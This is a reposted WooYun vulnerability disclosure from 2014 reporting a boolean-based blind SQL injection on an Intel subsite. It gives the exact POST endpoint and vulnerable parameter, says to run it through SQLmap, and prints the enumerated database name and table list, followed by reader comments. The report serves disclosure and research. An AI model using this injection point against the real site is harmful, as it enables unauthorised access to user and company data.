英特尔公司某分站MySQL盲注

admin
admin
admin
140816
文章
117
评论
2015年7月28日02:58:14评论261 views字数 214阅读0分42秒阅读模式
摘要

2014-11-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-17: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(8) 关注此漏洞

缺陷编号: WooYun-2014-81773

漏洞标题: 英特尔公司某分站MySQL盲注

相关厂商: intel.com

漏洞作者: lijiejie英特尔公司某分站MySQL盲注

提交时间: 2014-11-02 22:29

公开时间: 2014-12-17 22:30

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 10

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2014-11-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

英特尔公司某分站MySQL盲注,boolean based。

详细说明:

注入点:

code 区域 
POST http://networkbuilders.intel.com/endusers/index.php?option=com_spfiles&task=shortingData
 companyName=telefonica&fieldName=title&shoringName=ASC

参数companyName可注入。

漏洞证明:

可直接扔给SQLmap即可。

current user: ''

current database: 'inb_new'

数据表:

code 区域 
Database: inb_new
 [124 tables]
 +-------------------------------------------+
 |  jos_cwa_product_category_map_22sept2014  |
 | jos_csci_companymanager                   |
 | jos_csci_pro_category                     |
 | jos_csci_pro_pdf_download_track           |
 | jos_csci_products                         |
 | jos_cwa_product_category_map              |
 | sdion_assets                              |
 | sdion_associations                        |
 | sdion_banner_clients                      |
 | sdion_banner_tracks                       |
 | sdion_banners                             |
 | sdion_catalog_category                    |
 | sdion_catalog_product                     |
 | sdion_catalog_product_modification_note   |
 | sdion_catalog_product_resource_xref       |
 | sdion_catalog_product_specification_xref  |
 | sdion_catalog_track_category              |
 | sdion_catalog_track_contact_hit           |
 | sdion_catalog_track_product_hit           |
 | sdion_catalog_track_product_search        |
 | sdion_categories                          |
 | sdion_company_registration_company_detail |
 | sdion_company_user_information            |
 | sdion_companytracker                      |
 | sdion_contact_details                     |
 | sdion_content                             |
 | sdion_content_frontpage                   |
 | sdion_content_rating                      |
 | sdion_content_types                       |
 | sdion_contentitem_tag_map                 |
 | sdion_contest_category                    |
 | sdion_contest_form_details                |
 | sdion_core_log_searches                   |
 | sdion_docman_categories                   |
 | sdion_docman_category_orderings           |
 | sdion_docman_category_relations           |
 | sdion_docman_company                      |
 | sdion_docman_company_user                 |
 | sdion_docman_documents                    |
 | sdion_docman_documents_activity           |
 | sdion_docman_documents_activity_master    |
 | sdion_docman_documents_links              |
 | sdion_docman_documents_version            |
 | sdion_docman_mimetypes                    |
 | sdion_download_track                      |
 | sdion_extensions                          |
 | sdion_extman_dependencies                 |
 | sdion_extman_extensions                   |
 | sdion_files_containers                    |
 | sdion_files_thumbnails                    |
 | sdion_finalcontest_details                |
 | sdion_finder_filters                      |
 | sdion_finder_links                        |
 | sdion_finder_links_terms0                 |
 | sdion_finder_links_terms1                 |
 | sdion_finder_links_terms2                 |
 | sdion_finder_links_terms3                 |
 | sdion_finder_links_terms4                 |
 | sdion_finder_links_terms5                 |
 | sdion_finder_links_terms6                 |
 | sdion_finder_links_terms7                 |
 | sdion_finder_links_terms8                 |
 | sdion_finder_links_terms9                 |
 | sdion_finder_links_termsa                 |
 | sdion_finder_links_termsb                 |
 | sdion_finder_links_termsc                 |
 | sdion_finder_links_termsd                 |
 | sdion_finder_links_termse                 |
 | sdion_finder_links_termsf                 |
 | sdion_finder_taxonomy                     |
 | sdion_finder_taxonomy_map                 |
 | sdion_finder_terms                        |
 | sdion_finder_terms_common                 |
 | sdion_finder_tokens                       |
 | sdion_finder_tokens_aggregate             |
 | sdion_finder_types                        |
 | sdion_languages                           |
 | sdion_menu                                |
 | sdion_menu_types                          |
 | sdion_messages                            |
 | sdion_messages_cfg                        |
 | sdion_modules                             |
 | sdion_modules_menu                        |
 | sdion_newsfeeds                           |
 | sdion_om_accessGroups                     |
 | sdion_om_config                           |
 | sdion_om_membershiptypes                  |
 | sdion_om_panelTaskRelation                |
 | sdion_om_panels                           |
 | sdion_om_tasks                            |
 | sdion_organization_user_details           |
 | sdion_organization_user_details_old       |
 | sdion_overrider                           |
 | sdion_postinstall_messages                |
 | sdion_productsearch_tbl_product           |
 | sdion_redirect_links                      |
 | sdion_registration_company                |
 | sdion_resource_tracker                    |
 | sdion_schemas                             |
 | sdion_sdkform                             |
 | sdion_secondary_member_job                |
 | sdion_send_email_to_this                  |
 | sdion_session                             |
 | sdion_simplecustomrouter                  |
 | sdion_sp_pdf_download_track               |
 | sdion_summitreception                     |
 | sdion_tags                                |
 | sdion_template_styles                     |
 | sdion_ucm_base                            |
 | sdion_ucm_content                         |
 | sdion_ucm_history                         |
 | sdion_update_sites                        |
 | sdion_update_sites_extensions             |
 | sdion_updates                             |
 | sdion_user_keys                           |
 | sdion_user_notes                          |
 | sdion_user_profiles                       |
 | sdion_user_usergroup_map                  |
 | sdion_usergroups                          |
 | sdion_users                               |
 | sdion_users_10_10_2014                    |
 | sdion_viewlevels                          |
 | sdion_weblinks                            |
 | sdion_wf_profiles                         |
 +-------------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-11-03 09:51 | zzR 英特尔公司某分站MySQL盲注 ( 核心白帽子 | Rank:1408 漏洞数:127 | 东方红**联盟欢迎你-0-)

    0

    $$$$$$$$$$

  2. 2014-11-03 10:27 | xsser 英特尔公司某分站MySQL盲注 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

    0

    大神

  3. 2014-11-03 11:07 | lijiejie 英特尔公司某分站MySQL盲注 ( 核心白帽子 | Rank:2527 漏洞数:325 | Just for fun.)

    0

    @xsser xsser乃真神也。。。 英特尔公司某分站MySQL盲注

  4. 2014-11-10 11:24 | Vigoss_Z ( 普通白帽子 | Rank:467 漏洞数:73 | 楞娃)

    1

    @xsser 我觉得可以给lz加大v了。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin